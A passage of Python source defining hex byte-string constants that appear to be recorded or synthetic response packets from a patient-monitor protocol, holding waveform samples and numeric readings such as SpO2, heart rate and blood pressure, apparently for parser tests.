b"\x20\x29\x20\x31\x20\x37\x20\x3d\x20\x45\x20\x4d\x20\x53\x20\x59" \ b"\x20\x5f\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x0a\xbd\x0a\xf3\x0b\x25\x0b\x53\x0b\x7b\x0b\x9f\x0b\xbd" \ b"\x0b\xd5\x0b\xe8\x0b\xf6\x0b\xfe\x0c\x00\x0b\xfc\x0b\xf3\x0b\xe5" \ b"\x0b\xd2\x0b\xba\x0b\x9d\x0b\x7b\x0b\x56\x0b\x2c\x0b\x00\x0a\xd0" \ b"\x0a\x9d\x0a\x68\x0a\x31\x09\xf9\x09\xbf\x09\x85\x09\x4b\x09\x10" \ b"\x08\xd7" rsp_wave_4_no_4 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x03\x0e\x80\x18\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x20\x8d\x20\x96\x20\x9f\x20\xa8\x20\xad\x20\xab\x20\xa6" \ b"\x20\x9e\x20\x95\x20\x8c\x20\x82\x20\x78\x20\x6e\x20\x63\x20\x59" \ b"\x20\x4f\x20\x45\x20\x3a\x20\x30\x20\x26\x20\x1c\x20\x12\x20\x08" \ b"\x1f\xff\x1f\xf7\x1f\xf3\x1f\xf0\x1f\xee\x1f\xed\x1f\xed\x1f\xec" \ b"\x1f\xec\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xed\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee" \ b"\x1f\xee\x1f\xee\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x20\x25\x20\x28\x20\x2b\x20\x2e\x20\x31\x20\x33\x20\x30" \ b"\x20\x30\x20\x2d\x20\x2a\x20\x28\x20\x26\x20\x22\x20\x1f\x20\x1d" \ b"\x20\x19\x20\x17\x20\x14\x20\x12\x20\x0e\x20\x0c\x20\x0a\x20\x06" \ b"\x20\x03\x20\x01\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfc" \ b"\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x20\x00\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x20\x01\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x20\x67\x20\x6d\x20\x73\x20\x79\x20\x7b\x20\x77\x20\x75" \ b"\x20\x6d\x20\x67\x20\x61\x20\x59\x20\x51\x20\x4b\x20\x43\x20\x3b" \ b"\x20\x35\x20\x2d\x20\x25\x20\x1d\x20\x17\x20\x0f\x20\x07\x20\x01" \ b"\x1f\xfb\x1f\xf5\x1f\xf3\x1f\xf1\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xf1\x1f\xf1\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x08\x9e\x08\x66\x08\x30\x07\xfb\x07\xc9\x07\x99\x07\x6b" \ b"\x07\x40\x07\x18\x06\xf3\x06\xd2\x06\xb3\x06\x97\x06\x7f\x06\x69" \ b"\x06\x57\x06\x47\x06\x3a\x06\x2f\x06\x27\x06\x21\x06\x1d\x06\x1a" \ b"\x06\x19\x06\x19\x06\x1a\x06\x1b\x06\x1d\x06\x1e\x06\x20\x06\x20" \ b"\x06\x20" rsp_nu_5_no_1 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x80\x2f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_5_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x80\x2f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_5_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x80\x2f\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_5_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x01\x2e\x00\x04\x00\x07\x01\x28\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x01\x1e\x00\x03\x00\x00\x0e\x80\x00\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x01\x04\x00\x00\x00\x02" \ b"\x00\xfe\x08\x11\x00\x0f\x00\xa8\x09\x21\x00\x02\x08\x11\x09\x2f" \ b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x80\x10\x0e\x30\x00" \ b"\x0a\x16\x00\x14\x00\x04\x00\x10\x00\x04\x80\x08\x00\x03\x40\x01" \ b"\x00\x02\x80\x04\x00\x05\x40\x02\x09\x8d\x00\x04\x00\x00\x00\x10" \ b"\x09\x24\x00\x04\x00\x02\x01\x3d\x09\x27\x00\x10\x00\x0e\x00\x49" \ b"\x00\x49\x00\x49\x00\x20\x00\x20\x00\x20\x00\x00\x09\x96\x00\x02" \ b"\x10\xb2\x09\x45\x00\x02\x02\x40\x09\x11\x00\x02\x00\x02\x09\x40" \ b"\x00\x02\x00\x00\x09\x6f\x00\x0c\xfe\xff\xf0\x00\xfd\x00\x9f\xfb" \ b"\x00\x00\x3f\xff\x09\x64\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01" \ b"\x1f\xca\x20\x92\x00\x00\x00\x00\x09\x6a\x00\x04\x1e\x9e\x21\xbe" \ b"\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00\x00\x40" \ b"\x06\x1f\x06\x1d\x06\x1a\x06\x15\x06\x0e\x06\x05\x05\xfb\x05\xef" \ b"\x05\xe0\x05\xd0\x05\xbe\x05\xab\x05\x95\x05\x7f\x05\x66\x05\x4d" \ b"\x05\x33\x05\x18\x04\xfc\x04\xe1\x04\xc6\x04\xab\x04\x91\x04\x78" \ b"\x04\x60\x04\x4b\x04\x37\x04\x26\x04\x18\x04\x0d\x04\x05\x04\x01" rsp_wave_5_no_2 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x01\x0e\x80\x08\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x04\x00\x04\x04\x04\x0b\x04\x18\x04\x28\x04\x3e\x04\x57" \ b"\x04\x76\x04\x99\x04\xc0\x04\xec\x05\x1d\x05\x51\x05\x89\x05\xc5" \ b"\x06\x05\x06\x47\x06\x8c\x06\xd3\x07\x1c\x07\x67\x07\xb3\x07\xff" \ 